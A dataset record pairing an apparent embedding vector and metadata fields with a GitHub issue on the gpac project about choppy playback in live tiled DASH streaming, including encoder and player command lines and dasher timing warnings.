-0.020273098722100258, 0.007622111588716507, -0.028368009254336357, -0.013238404877483845, 0.019757315516471863, 0.0067302389070391655, 0.010158039629459381, -0.0033364647533744574, 0.011490476317703724, 0.0025520464405417442, -0.005021710880100727, -0.012328622862696648, 0.013360186479985714, -0.04819696396589279, -0.000050201437261421233, -0.002091782633215189, -0.01334585901349783, -0.019083933904767036, 0.004788892809301615, 0.024943791329860687, -0.014671132899820805, -0.004179983399808407, -0.0019735824316740036, -0.012299967929720879, -0.008725312538444996, 0.003803892293944955, -0.011927458457648754, 0.012873059138655663, -0.015043641440570354, -0.00025878645828925073, -0.007267511449754238, 0.0015742096584290266, -0.01189880445599556, 0.006382802035659552, -0.00038280696026049554, 0.005788220092654228, -0.01971433497965336, 0.0022565461695194244, -0.017393315210938454, -0.023783281445503235, 0.026577100157737732, -0.02348240837454796, 0.0029693283140659332, 0.014943351037800312, 0.006887838710099459, 0.0014757096068933606, -0.021605534479022026, 0.007163638714700937, 0.0038325467612594366, -0.002750837244093418, -0.007324820850044489, 0.0037573284935206175, 0.00648667523637414, -0.00839578453451395, -0.00003595810994738713, 0.036649174988269806, 0.0015419733244925737, -0.01222833152860403, -0.009384366683661938, -0.014900368638336658, -0.006826947908848524, 0.007629275321960449, 0.01070247683674097, 0.009699567221105099, -0.025559863075613976, 0.002899482846260071, -0.009291240014135838, -0.012880222871899605, 0.004273110534995794, -0.01518691424280405, -0.003105437383055687, -0.00019677620730362833, -0.004215801600366831, 0.0021849097684025764, 0.021290333941578865, -0.01217818632721901, 0.004126255866140127, 0.004040292464196682, -0.007163638714700937, -0.008560548536479473, 0.015645386651158333, 0.005874183960258961, -0.008051929995417595, -0.003261246718466282, -0.006859184242784977, 0.0048533654771745205, 0.00035773421404883265, 0.005666438490152359, 0.023511063307523727, -0.008231021463871002, 0.006572638638317585, -0.025660155341029167, 0.010208185762166977, -0.013460477814078331, 0.03180655837059021, 0.023597026243805885, -0.00016073415463324636, 0.006056856829673052, 0.0077797118574380875, 0.01079560350626707, -0.001066486700437963, -0.0020756644662469625, -0.010867239907383919, 0.0013118414208292961, 0.02273738943040371, -0.0030839466489851475, 0.019757315516471863, -0.013668223284184933, -0.02077455259859562, -0.025903718546032906, 0.009914476424455643, -0.005551820155233145, 0.0006004024762660265, 0.0015571960248053074, 0.006346983835101128, 0.024929463863372803, 0.0010942458175122738, -0.034471429884433746, -0.02214997075498104, -0.005655692890286446, 0.0008430707384832203, 0.027178846299648285, 0.012801422737538815, 0.020230116322636604, -0.006780384108424187, 0.010401603765785694, -0.008460257202386856, 0.005945820361375809, -0.006042529363185167, -0.02644815482199192, -0.003940001595765352, -0.00842443946748972, 0.002487573539838195, 0.008882911875844002, 0.014090877957642078, -0.0335831381380558, 0.004885601811110973, -0.010516221635043621, -0.005172147415578365, -0.0081164026632905, 0.007729566190391779, -0.02255113609135151, -0.019585389643907547, -0.0006474138936027884, -0.007858511991798878, -0.026562772691249847, -0.021920735016465187, 0.006311165634542704, 0.0030141009483486414, 0.007324820850044489, 0.0015088414074853063, -0.0015786868752911687, 0.012285640463232994, -0.042752597481012344, -0.0022834099363535643, -0.012593677267432213, -0.0011417049681767821, -0.012959023006260395, -0.007378547918051481, 0.019828952848911285, -0.03424219414591789, -0.020230116322636604, -0.00823818426579237, 0.017837461084127426, 0.010165203362703323, -0.014785750769078732, -0.010480403900146484, -0.042064886540174484, -0.016032224521040916, -0.01859680563211441, 0.012930368073284626, 0.012464731931686401, -0.0009841049322858453, -0.010630840435624123, -0.008603530004620552, -0.00947033055126667, -0.012013422325253487, -0.012550695799291134, -0.012371604330837727, -0.013331531547009945, -0.007922984659671783, -0.007629275321960449, -0.016734261065721512, -0.030316520482301712, -0.006246692966669798, -0.005777474958449602, -0.01151196751743555, 0.008231021463871002, 0.01666262373328209, 0.006705165840685368, -0.015588078647851944, -0.0035495830234140158, -0.014800078235566616, 0.010867239907383919, -0.01594625972211361, 0.006314747501164675, -0.015172586776316166, -0.001509736874140799, -0.0016449505928903818, 0.007937312126159668, -0.016304442659020424, -0.0031931919511407614, -0.021519571542739868, -0.004276692401617765, -0.0035585376899689436, -0.013245568610727787, -0.004452201537787914, 0.00778687559068203, 0.029514191672205925, -0.010881567373871803, 0.005276020150631666, 0.00822385773062706, 0.00025117507902905345, -0.00663352943956852, -0.01775149628520012, 0.01997222565114498, -0.013274222612380981, -0.009405857883393764, 0.00510767474770546, -0.012522040866315365, -0.00643294770270586, 0.00459547434002161, 0.005910002160817385, 0.005240201950073242, -0.0081164026632905, -0.012385931797325611, -0.004921420011669397, 0.0022064007353037596, -0.016891861334443092, -0.00822385773062706, 0.02090349793434143, 0.01502931397408247, -0.0009066480561159551, -0.0023138553369790316, 0.0038110557943582535, 0.004194310400635004, -0.013087968342006207, -0.0018338916124776006, 0.029198992997407913, -0.0015258550411090255, 0.02937091886997223, 0.006096256896853447, -0.012486222200095654, -0.02971477434039116, 0.007045438978821039, -0.001971791498363018, 0.0030087283812463284, -0.011297058314085007, 0.008216693997383118, -0.006905748043209314, 0.019198551774024963, -0.0026362191420048475, 0.025645827874541283, -0.010516221635043621, -0.022106990218162537, -0.01502931397408247, 0.002661291742697358, 0.029772082343697548, 0.011404513381421566, 0.005236620083451271, 0.003893437795341015, -0.009427349083125591, -0.009413021616637707, -0.002236846135929227, -0.007550475187599659, 0.010516221635043621, -0.001500782324001193, -0.01819564215838909, -0.005806129425764084, -0.018768733367323875, 0.04177834093570709, 0.008796948939561844, 0.005841947626322508, 0.008281166665256023, -0.004742329008877277, 0.0020326825324445963, 0.0005807025008834898, -0.004964401945471764, -0.025488227605819702, 0.009334221482276917, -0.017579570412635803, -0.02408415451645851, -0.0010476821335032582, 0.009491821750998497, -0.011927458457648754, 0.017780151218175888, -0.011798513121902943, 0.01915557123720646, 0.011096476577222347, 0.015688369050621986, 0.03361179307103157, -0.01766553334891796, 0.008030438795685768, 0.01126124057918787, -0.01242891326546669, -0.006758893374353647, -0.018238624557852745, 0.004201474133878946, 0.028869464993476868, -0.007715239189565182, -0.013596586883068085, -0.00030176827567629516, -0.003682110458612442, 0.021046770736575127, -0.0006814411608502269, -0.019671352580189705, -0.011117967776954174, -0.017765823751688004, 0.0198146253824234, 0.006963056977838278, -0.0013136322377249599, -0.008274002932012081, 0.004620546940714121, 0.012385931797325611, -0.008732476271688938, -0.014929023571312428, -0.0028153101447969675, -0.004445037804543972, -0.020645607262849808, 0.002141928067430854, -0.019700007513165474, -0.0007297957199625671, -0.031978484243154526, 0.013259895145893097, -0.004154910333454609, -0.0074931662529706955, -0.007829857058823109, 0.00724960258230567, -0.019241534173488617, 0.02735077403485775, -0.023124225437641144, -0.003565701190382242, 0.0024320553056895733, -0.009556294418871403, 0.02576044574379921, 0.01666262373328209, -0.005465856287628412, 0.007557638920843601, -0.010150875896215439, -0.00033736260957084596, 0.010530549101531506, -0.023324808105826378, -0.01222833152860403, 0.01806669682264328, 0.0035280920565128326, 0.004688601475208998, 0.026949608698487282, -0.004806801676750183, -0.020975135266780853, -0.002154464367777109, -0.01676291413605213, -0.02008684352040291, 0.012751277536153793, -0.019800297915935516, -0.00461696507409215, -0.0016906188102439046, 0.0038683649618178606, -0.02257978916168213, -0.0006451752269640565, 0.026204591616988182, -0.014355932362377644, 0.008703821338713169, 0.0051399110816419125, -0.013453314080834389, 0.005978056695312262, 0.0021401371341198683, -0.010000440292060375, -0.0006344297435134649, 0.03192117437720299, -0.005845529492944479, -0.000014663073670817539, -0.011877313256263733, 0.007772548124194145, -0.010809930972754955, 0.010036258026957512, 0.025344954803586006, 0.027966845780611038, -0.0014273551059886813, -0.0006532343104481697, -0.024227427318692207, -0.022350553423166275, -0.0030230556149035692, -0.004068946931511164, 0.0081164026632905, -0.020015206187963486, 0.0062646022997796535, -0.01078127697110176, 0.00046429334906861186, -0.016734261065721512, 0.014542186632752419, 0.017149752005934715, 0.0031143920496106148, -0.0010861867340281606, 0.0010315639665350318, 0.03111884742975235, 0.008445930667221546, -0.018081024289131165, 0.01482873223721981, -0.013123786076903343, 0.02713586390018463, 0.009090657345950603, 0.005168565548956394, -0.010272658430039883, -0.006060438696295023, -0.0028385918121784925, -0.013417495414614677, 0.023038262501358986, 0.001505259657278657, 0.009699567221105099, 0.007657929789274931, 0.00648667523637414, 0.0025610008742660284, 0.025402262806892395, -0.010100730694830418, 0.01631877012550831, -0.0014076550723984838, 0.003180655650794506, 0.00219565536826849, -0.00806625746190548, 0.012214004062116146, -0.002920973813161254, -0.004101183265447617, -0.0034224283881485462, -0.013990586623549461, -0.02310989983379841, 0.017651205882430077, -0.015201241709291935, -0.016032224521040916, -0.001894782530143857, 0.014699786901473999, -0.0006836797692812979, -0.005798965692520142, -0.03143404796719551, 0.0012957231374457479, 0.011211094446480274, 0.01563105918467045, -0.011762695387005806, 0.012421749532222748, 0.004921420011669397, 0.004860529210418463, -0.011562112718820572, 0.01187014952301979, 0.00040855127735994756, -0.013496295548975468, -0.001460486906580627, 0.004222965333610773, 0.004445037804543972, -0.01043742150068283, 0.011920294724404812, 0.008231021463871002, 0.03856903314590454, -0.014406077563762665, 0.018854698166251183, -0.0010279822163283825, -0.010595021769404411, -0.001706736977212131, 0.008847094140946865, -0.0049715652130544186, -0.002731137443333864, -0.013374513946473598, 0.015802986919879913, 0.015416150912642479, 0.010630840435624123, 0.008231021463871002, -0.01054487656801939, -0.004036710597574711, -0.0010906640673056245, 0.007521820720285177, -0.01262949500232935, 0.01465680543333292, -0.009527639485895634, -0.01038727629929781, 0.023038262501358986, 0.00742869358509779, -0.0067302389070391655, 0.005673602223396301, 0.003553164890035987, 0.002405191771686077, -0.0015527186915278435, -0.019542407244443893, -0.005279602017253637, -0.005046783480793238, 0.013954768888652325, 0.005455111153423786, -0.02074589766561985, -0.016032224521040916, 0.012744113802909851, -0.00883276667445898, -0.02096080780029297, 0.011762695387005806, 0.012471895664930344, 0.006346983835101128, 0.04109063372015953, -0.006902166176587343, 0.005207965616136789, -0.019957898184657097, 0.0081164026632905, -0.008180875331163406, -0.02653411775827408, 0.006855602376163006, -0.004788892809301615, -0.000829191179946065, 0.022235935553908348, 0.018109679222106934, -0.015172586776316166, 0.006547566037625074, 0.013331531547009945, 0.005773893091827631, -0.02289498969912529, 0.013073640875518322, 0.0036892739590257406, -0.005720165558159351, 0.004240874201059341, 0.014226987026631832, -0.019785970449447632, -0.02071724459528923, -0.004702928941696882, -0.01937047950923443, -0.005773893091827631, 0.0027526281774044037, -0.016247132793068886, 0.014277132228016853, 0.009456003084778786, 0.03404161334037781, -0.014341604895889759, 0.01182000432163477, 0.028740519657731056, -0.025688808411359787, -0.04189296066761017, 0.0013225867878645658, -0.011325713247060776, -0.005361983552575111, -0.0023783280048519373, 0.016533678397536278, -0.006325493101030588, 0.009721058420836926, 0.006726657040417194, 0.00651174783706665, 0.003399146720767021, 0.013653895817697048, -0.0017273324774578214, -0.009506149217486382, -0.014800078235566616, -0.000824713904876262, 0.012658149935305119, -0.012414585798978806, -0.0019109006971120834, -0.012077894993126392, 0.013947605155408382, 0.025273317471146584, 0.011519131250679493, -0.03212175518274307, -0.01891200616955757, 0.0006133865681476891, -0.013696877285838127, -0.0034510830882936716, -0.0007378548034466803, 0.0008529207552783191, -0.004706510808318853, -0.012994840741157532, -0.013216913677752018, 0.010552040301263332, 0.009341385215520859, -0.005010965280234814, -0.008610693737864494, 0.010638004168868065, 0.010050585493445396, 0.0006863661692477763, 0.015459132380783558, 0.0035137648228555918, 0.01947076991200447, 0.009212439879775047, 0.011984768323600292, 0.0007535252370871603, -0.03392699360847473, 0.011239749379456043, 0.014241314493119717, -0.015158260241150856, -0.016705606132745743, 0.0010682776337489486, -0.03318197652697563, 0.022536808624863625, 0.013983422890305519, -0.014026405289769173, 0.0025341373402625322, 0.0034743647556751966, 0.003263037418946624, -0.025244662538170815, -0.014198332093656063, 0.0015151096740737557, 0.015645386651158333, 0.008682330138981342, -0.03839710354804993, 0.0023281825706362724, 0.004828292410820723, -0.004179983399808407, -0.0021473008673638105, -0.036276668310165405, 0.012701131403446198, 0.014900368638336658, -0.004341165069490671, 0.009241093881428242, 0.002763373777270317, -0.02750837244093418, 0.022064007818698883, -0.00025833872496150434, -0.004541747272014618, -0.0040976013988256454, -0.014671132899820805, 0.02273738943040371, 0.0071708024479448795, -0.0037286740262061357, -0.009011858142912388, -0.0024141462054103613, -0.018267279490828514, -0.0015419733244925737, -0.006393547635525465, 0.013668223284184933, 0.013875968754291534, -0.011963277123868465, -0.0005278706667013466, 0.004856947343796492, -0.008560548536479473, 0.013718368485569954, -0.001035145833157003, -0.0024213099386543036, -0.0016189824091270566, -0.018639788031578064, -0.006146402098238468, -0.014484877698123455, 0.003857619594782591, -0.017250042408704758, -0.005483765620738268, 0.015602405183017254, -0.017235714942216873, 0.010946040041744709, -0.011282730847597122, -0.013797168619930744, 0.010774113237857819, 0.0018312052125111222, 0.004509510472416878, 0.0052581108175218105, -0.01314527727663517, 0.011769859120249748, 0.010473240166902542, -0.01782313361763954, -0.015645386651158333, 0.014843059703707695, -0.009742548689246178, -0.011211094446480274, -0.004957238212227821, -0.012185350060462952, 0.008295494131743908, -0.02809579111635685, -0.001545555074699223, 0.003660619491711259, -0.0018061324954032898, 0.0027006918098777533, 0.018496515229344368, 0.017278697341680527, 0.02610429935157299, -0.00375374685972929, -0.004613383673131466, -0.00012066254566889256, 0.002688155509531498, 0.010408767499029636, 0.00487485621124506, -0.0030839466489851475, -0.012744113802909851, 0.003993728663772345, 0.01485738717019558, -0.0037752375937998295, 0.023697316646575928, -0.005960147362202406, 0.00985716748982668, 0.010874403640627861, -0.010573530569672585, -0.002124018967151642, 0.009255421347916126, 0.011232585646212101, -0.0024392190389335155, 0.01066665817052126, 0.006250274833291769, 0.006225202232599258, 0.005250947084277868, -0.013961932621896267, 0.006769638974219561, -0.015057968907058239, -0.015201241709291935, -0.002235055435448885, 0.004380565136671066, 0.00651174783706665, -0.012959023006260395, -0.001469441456720233, 0.022594116628170013, 0.006035365629941225, -0.030259210616350174, -0.013087968342006207, -0.006142820231616497, 0.00987149402499199, 0.018883351236581802, -0.0184678602963686, 0.011784185655415058, 0.016333097591996193, 0.01066665817052126, -0.0025036917068064213, -0.001621668809093535, -0.0015339141245931387, 0.01697782427072525, 0.025301972404122353, -0.03942866995930672, -0.022694408893585205, -0.03252292051911354, -0.006794711574912071, -0.018768733367323875, 0.005003801546990871, 0.0023765373043715954, -0.012407422997057438, -0.005924329161643982, -0.0006402502185665071, -0.0075648026540875435, -0.009019020944833755, 0.027895210310816765, -0.00025430918321944773, -0.000054258969612419605, 0.023224517703056335, 0.0065153297036886215, -0.021046770736575127, 0.009692403487861156, -0.003714346792548895, 0.016805896535515785, 0.000682784360833466, -0.028267718851566315, -0.01965702511370182, -0.003667783224955201, -0.016304442659020424, -0.0190266240388155, 0.0015706277918070555, -0.004591892473399639, -0.0028600827790796757, 0.014728441834449768, 0.008689493872225285, 0.017679860815405846, 0.012457568198442459, -0.01865411549806595, 0.009656584821641445, 0.0009133639396168292, 0.01171254925429821, -0.001361986855044961, 0.01021534949541092, -0.01819564215838909, 0.0015616732416674495, -0.003732255892828107, 0.006852020509541035, 0.014886041171848774, 0.010415931232273579, -0.00041146151488646865, -0.015272878110408783, -0.020230116322636604, -0.008632184937596321, -0.02329615317285061, 0.0035639102570712566, -0.00037788195186294615, 0.0009966412326321006, -0.02769462764263153, 0.006035365629941225, 0.012471895664930344, 0.005179311148822308, -0.023511063307523727, -0.02018713392317295, 0.010931712575256824, -0.0067015839740633965, 0.002835010178387165, -0.014570841565728188, -0.021447934210300446, -0.01682022400200367, -0.00778687559068203, -0.010759785771369934, 0.0021204371005296707, -0.004176401533186436, 0.016189824789762497, 0.007837020792067051, 0.023869244381785393, 0.017579570412635803, 0.01079560350626707, -0.03467201068997383, 0.005927911028265953, 0.02361135371029377, -0.0014586959732696414, -0.0068376935087144375, -0.025860736146569252, -0.00895454827696085, 0.009484658017754555, 0.005387056618928909, 0.016232805326581, 0.030488446354866028, 0.002870828378945589, -0.0017980734119191766, -0.005465856287628412, 0.01557375118136406, -0.0050073834136128426, 0.0153731694445014, 0.011268404312431812, 0.0116982227191329, 0.002670246409252286, -0.005920747760683298, 0.010000440292060375, -0.016462042927742004, 0.015674041584134102, 0.0086751664057374, -0.0007987457211129367, 0.020445024594664574, 0.02703557349741459, 0.00732840271666646, 0.031319428235292435, 0.015129605308175087, -0.006422202102839947, 0.010158039629459381, -0.005376311019062996, 0.004548910539597273, 0.0009259002981707454, 0.003042755648493767, -0.009613603353500366, -0.01378284115344286, 0.013689713552594185, -0.009742548689246178, 0.00794447585940361, 0.01002909429371357, 0.004523837938904762, -0.01875440590083599, 0.003911346662789583, 0.0015983869088813663, 0.012493385933339596, 0.005000220146030188, 0.009563458152115345, -0.00571658369153738, -0.01030847616493702, 0.024771863594651222, 0.02488648146390915, -0.010530549101531506, 0.004341165069490671, -0.008180875331163406, -0.0048891836777329445, 0.011039167642593384, -0.02448531799018383, 0.018553825095295906, 0.0016207733424380422, -0.01891200616955757, 0.0031287192832678556, -0.010115058161318302, -0.0015885368920862675, 0.004688601475208998, 0.002924555679783225, -0.010158039629459381, -0.0007056184113025665, 0.006776802241802216, -0.011777021922171116, -0.004330419935286045, 0.009305566549301147, -0.02186342515051365, -0.008589203469455242, 0.015057968907058239, -0.003825383260846138, 0.0006975593278184533, -0.011590767651796341, 0.013403167948126793, -0.0037215102929621935, 0.013689713552594185, -0.014814404770731926, -0.00985716748982668, -0.014076550491154194, 0.011411677114665508, -0.013868805021047592, -0.018639788031578064, -0.010852913372218609, 0.013403167948126793, -0.005641365423798561, 0.003631965024396777, -0.03146270290017128, -0.001263486803509295, 0.0012312504695728421, -0.008159385062754154, 0.014083714224398136, -0.007013202644884586, 0.004656365141272545, -0.009656584821641445, -0.024499645456671715, -0.012156695127487183, 0.003807474160566926, 0.01314527727663517, 0.004448619671165943, 0.028024155646562576, 0.007758221123367548, 0.014133859425783157, -0.013947605155408382, 0.003807474160566926, 0.019556734710931778, -0.01217818632721901, 0.01841055229306221, -0.009405857883393764, 0.00269531924277544, 0.0085820397362113, 0.03349717706441879, 0.017407642677426338, 0.011827168054878712, -0.005931492894887924, 0.008374294266104698, 0.000012494393558881711, 0.015229896642267704, -0.014900368638336658, -0.016433387994766235, -0.002562791807577014, 0.019399134442210197, -0.00021770746388938278, -0.027794918045401573, -0.008882911875844002, -0.010201022028923035, 0.024872153997421265, 0.009341385215520859, 0.009728221222758293, 0.014900368638336658, 0.00345824658870697, 0.00027781486278399825, 0.0011855822522193193, -0.022966627031564713, 0.005122001748532057, -0.01570269651710987, -0.008925894275307655, -0.004993056412786245, -0.014284295961260796, -0.040947359055280685, -0.007038275245577097, 0.0214909166097641, -0.0019270188640803099, -0.00855338480323553, 0.0009626139653846622, 0.0034385465551167727, -0.013847313821315765, 0.01965702511370182, 0.0038683649618178606, 0.00403312873095274, 0.015358841978013515, -0.014900368638336658, 0.012120877392590046, 0.023539718240499496, 0.01856815256178379, 0.016877533867955208, -0.015172586776316166, -0.0008287434466183186, -0.0067302389070391655, 0.0025968190748244524, 0.007872839458286762, 0.003245128318667412, -0.0023998189717531204, -0.0060819294303655624, -0.020301751792430878, -0.009004694409668446, 0.002944255480542779, 0.03215041011571884, 0.014234150759875774, -0.005265274550765753, -0.014255641028285027, -0.0023371372371912003, 0.016562333330512047, 0.011855822056531906, 0.005806129425764084, 0.011648076586425304, -0.01899797096848488, 0.010093566961586475, -0.00719587504863739, -0.017063787207007408, -0.00878262147307396, 0.04538881778717041, 0.009011858142912388, 0.025244662538170815, 0.010616512969136238, -0.012794259004294872, 0.006103420164436102, -0.006182220298796892, 0.0030929010827094316, 0.004434292670339346, 0.012801422737538815, -0.01090305857360363, 0.005304674617946148, 0.01859680563211441, -0.005859856493771076, -0.0005265274667181075, 0.004842619877308607, 0.004896347410976887, -0.020445024594664574, 0.003173491917550564, -0.031176157295703888, -0.015401823446154594, -0.007665093522518873, 0.017078114673495293, -0.03355448320508003, 0.009147967211902142, -0.012192513793706894, 0.003717928659170866, -0.02071724459528923, 0.004645620007067919, -0.019700007513165474, 0.02931361086666584, -0.01669127866625786, 0.009900148957967758, -0.0063720569014549255, 0.0008806798723526299, -0.007994621060788631, 0.009742548689246178, 0.018510842695832253, 0.0035728649236261845, -0.00487485621124506, 0.00010930145799648017, 0.006783965975046158, -0.008796948939561844, 0.009427349083125591, 0.012543532066047192, -0.005927911028265953, -0.02321019023656845, -0.01314527727663517, 0.0171640794724226, 0.01161942258477211, -0.0019234369974583387, 0.01099618524312973, -0.004871274344623089, 0.01570269651710987, -0.011891640722751617, 0.004079692531377077, 0.0025395099073648453, -0.02265142649412155, -0.013173932209610939, 0.0006406979518942535, -0.009807021357119083, -0.016390405595302582, -0.007231693249195814, 0.0038361286278814077, -0.0177228432148695, -0.0021831190679222345, -0.000014341268979478627, 0.019599715247750282, -0.007908657193183899, 0.020072516053915024, 0.0282820463180542, -0.002163419034332037, -0.017436297610402107, -0.0007289002533070743, -0.01361091434955597, -0.013202586211264133, 0.015072296373546124, -0.015315859578549862, 0.009362876415252686, 0.0067911297082901, -0.008295494131743908, 0.0006581593188457191, -0.003109019249677658, -0.006651438772678375, -0.004788892809301615, -0.010315639898180962, -0.004104765132069588, -0.02697826363146305, -0.010960367508232594, 0.016906186938285828, 0.012006258592009544, 0.014814404770731926, 0.001948509830981493, -0.008359966799616814, 0.010595021769404411, -0.003947164863348007, 0.0013584049884229898, -0.006400711368769407, -0.004008056130260229, -0.0005677184090018272, 0.017837461084127426, 0.008288330398499966, -0.0247002262622118, -0.0032970646861940622, 0.008016112260520458, -0.002365791704505682, 0.02464291825890541, 0.007693747989833355, -0.013718368485569954, 0.004541747272014618, 0.021290333941578865, -0.005533910822123289, -0.0034224283881485462, 0.009441675618290901, 0.014169678092002869, 0.00411192886531353, -0.010272658430039883, 0.0013628823217004538, 0.008417275734245777, -0.005566147621721029, -0.006576220504939556, -0.002240428002551198, 0.04980161786079407, 0.007192293647676706, 0.015817314386367798, -0.003700019558891654, -0.011196767911314964, 0.017307352274656296, 0.012479059398174286, 0.016490695998072624, 0.012457568198442459, -0.01110364031046629, 0.02899841032922268, 0.015745678916573524, -0.0057953838258981705, 0.015444805845618248, -0.016204150393605232, 0.02342509850859642, 0.010423094965517521, -0.005931492894887924, -0.00750749371945858, 0.041663724929094315, -0.009971785359084606, 0.0027400918770581484, -0.022106990218162537, 0.01482873223721981, -0.006218038499355316, 0.012822913937270641, -0.028797827661037445, -0.009463166818022728, 0.007657929789274931, 0.025301972404122353, 0.017837461084127426, 0.011583603918552399, -0.002231473568826914, 0.006218038499355316, 0.00415849220007658, 0.015287205576896667, -0.020788880065083504, -0.0050324564799666405, 0.008703821338713169, -0.0036713648587465286, 0.006278929300606251, 0.006107002031058073, -0.0037394193932414055, 0.013338695280253887, 0.009226767346262932, 0.002732928143814206, 0.01043742150068283, -0.0030803647823631763, -0.01663396880030632, -0.008130730129778385, -0.017579570412635803, -0.004040292464196682, 0.012156695127487183, 0.006644275039434433, 0.019456442445516586, -0.008094912394881248, 0.011963277123868465, 0.009584948420524597, 0.005433619953691959, 0.00878262147307396, -0.014663969166576862, 0.010043421760201454, 0.032752156257629395, -0.015430478379130363, -0.0032039375510066748, -0.01383298635482788, 0.016017897054553032, 0.013918950222432613, 0.012772767804563046, 0.005064692813903093, 0.016433387994766235, -0.012214004062116146, -0.023998189717531204, 0.026834990829229355, 0.01732167974114418, 0.01647636853158474, 0.0343281589448452, -0.013926113955676556, -0.008825602941215038, -0.009491821750998497, -0.0029048556461930275, 0.016333097591996193 ]
3,030
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
### Files Archive of the files used for this issue: https://www.mediafire.com/file/laq9u10c8jdgecx/tiled_playback_error.zip/file It contains: - cnpp.mp4, the video file used as input - the logs of the player and the encoder sessions ### How to reproduce Server Side: ``` gpac \ -+kvazaar-params=input-res=256x128,preset=ultrafast,tiles=2x2,slices=tiles,mv-constraint=frametilemargin,\ input-format=P420,qp=16,rc-algorithm=lambda,input-fps=30,gop=0\ erp-aqp=true \ -i cnpp.mp4:FID=I reframer:rt=on:SID=I:FID=R \ ffsws:SID=R:FID=Y:osize=256x128:ofmt=yuv420 \ enc:SID=Y:FID=K1:c=libkvazaar:b=20M:size=256x128:fintra=1:rc \ tilesplit:SID=K1:FID=1 \ -o http://localhost:8080/live.mpd:gpac:dmode\=dynamic:segdur\=4:cdur\=2:asto\=2:llhls\=br:profile\=live:sbound\="closest":rdirs\=outdir:template\=seg_live_:SID\=1 \ -graph -lu -stats -logs=all@info -log-file=file_to_tiles_server.log ``` Client Side: `gpac -i http://localhost:8080/live.mpd dashin:tile_mode=center tileagg ohevcdec vout -graph -logs=all@info -lu --skip_lqt -log-file=file_to_tiles_player.log` ### Observed behaviour The playback is choppy. Every N seconds, the playback stops, I see the segments being downloaded in the terminal, and starts again. This behaviour is only observed in tiled mode, when the tiling parameters are removed from the encoder (tilesplit acting then as a pass-through) and from the client, everything plays smoothly. The encoder seems to run perfectly, however it displays warnings like this: ``` UTC 2021-08-08T19:15:12Z (TS 1628450112654) - [Dasher] AS-1 Rep 1 segment 3 done TOO LATE by 1000 ms UTC 2021-08-08T19:15:12Z (TS 1628450112654) - [Dasher] AS-1 Rep 2 segment 3 done TOO LATE by 1000 ms UTC 2021-08-08T19:15:12Z (TS 1628450112654) - [Dasher] AS-1 Rep 3 segment 3 done TOO LATE by 1000 ms UTC 2021-08-08T19:15:12Z (TS 1628450112654) - [Dasher] AS-1 Rep 4 segment 3 done TOO LATE by 1000 ms UTC 2021-08-08T19:15:12Z (TS 1628450112654) - [Dasher] AS-1 Rep 5 segment 3 done TOO LATE by 1000 ms ``` When the same configuration is ran with tiling disabled, the same warning appears (though only once since there is only one representation), though it seems to have no impact on the playback. I have tried also by disabling the lowlatency mode on the player and encoder side, the playback is still choppy. ### Configuration OS: Ubuntu 20.04 Version: f42841f7105433023fcbdace975713873474ac95 compiled in release --- Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/
Choppy playback with live tiled DASH
https://api.github.com/repos/gpac/gpac/issues/1873/comments
6
2021-08-08T19:28:03
2021-09-07T14:09:50Z
https://github.com/gpac/gpac/issues/1873
963,499,394
1,873
false
This is a GitHub Issue repo:gpac owner:gpac Title : Choppy playback with live tiled DASH Issue date: --- start body --- ### Files Archive of the files used for this issue: https://www.mediafire.com/file/laq9u10c8jdgecx/tiled_playback_error.zip/file It contains: - cnpp.mp4, the video file used as input - the logs of the player and the encoder sessions ### How to reproduce Server Side: ``` gpac \ -+kvazaar-params=input-res=256x128,preset=ultrafast,tiles=2x2,slices=tiles,mv-constraint=frametilemargin,\ input-format=P420,qp=16,rc-algorithm=lambda,input-fps=30,gop=0\ erp-aqp=true \ -i cnpp.mp4:FID=I reframer:rt=on:SID=I:FID=R \ ffsws:SID=R:FID=Y:osize=256x128:ofmt=yuv420 \ enc:SID=Y:FID=K1:c=libkvazaar:b=20M:size=256x128:fintra=1:rc \ tilesplit:SID=K1:FID=1 \ -o http://localhost:8080/live.mpd:gpac:dmode\=dynamic:segdur\=4:cdur\=2:asto\=2:llhls\=br:profile\=live:sbound\="closest":rdirs\=outdir:template\=seg_live_:SID\=1 \ -graph -lu -stats -logs=all@info -log-file=file_to_tiles_server.log ``` Client Side: `gpac -i http://localhost:8080/live.mpd dashin:tile_mode=center tileagg ohevcdec vout -graph -logs=all@info -lu --skip_lqt -log-file=file_to_tiles_player.log` ### Observed behaviour The playback is choppy. Every N seconds, the playback stops, I see the segments being downloaded in the terminal, and starts again. This behaviour is only observed in tiled mode, when the tiling parameters are removed from the encoder (tilesplit acting then as a pass-through) and from the client, everything plays smoothly. The encoder seems to run perfectly, however it displays warnings like this: ``` UTC 2021-08-08T19:15:12Z (TS 1628450112654) - [Dasher] AS-1 Rep 1 segment 3 done TOO LATE by 1000 ms UTC 2021-08-08T19:15:12Z (TS 1628450112654) - [Dasher] AS-1 Rep 2 segment 3 done TOO LATE by 1000 ms UTC 2021-08-08T19:15:12Z (TS 1628450112654) - [Dasher] AS-1 Rep 3 segment 3 done TOO LATE by 1000 ms UTC 2021-08-08T19:15:12Z (TS 1628450112654) - [Dasher] AS-1 Rep 4 segment 3 done TOO LATE by 1000 ms UTC 2021-08-08T19:15:12Z (TS 1628450112654) - [Dasher] AS-1 Rep 5 segment 3 done TOO LATE by 1000 ms ``` When the same configuration is ran with tiling disabled, the same warning appears (though only once since there is only one representation), though it seems to have no impact on the playback. I have tried also by disabling the lowlatency mode on the player and encoder side, the playback is still choppy. ### Configuration OS: Ubuntu 20.04 Version: f42841f7105433023fcbdace975713873474ac95 compiled in release --- Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: 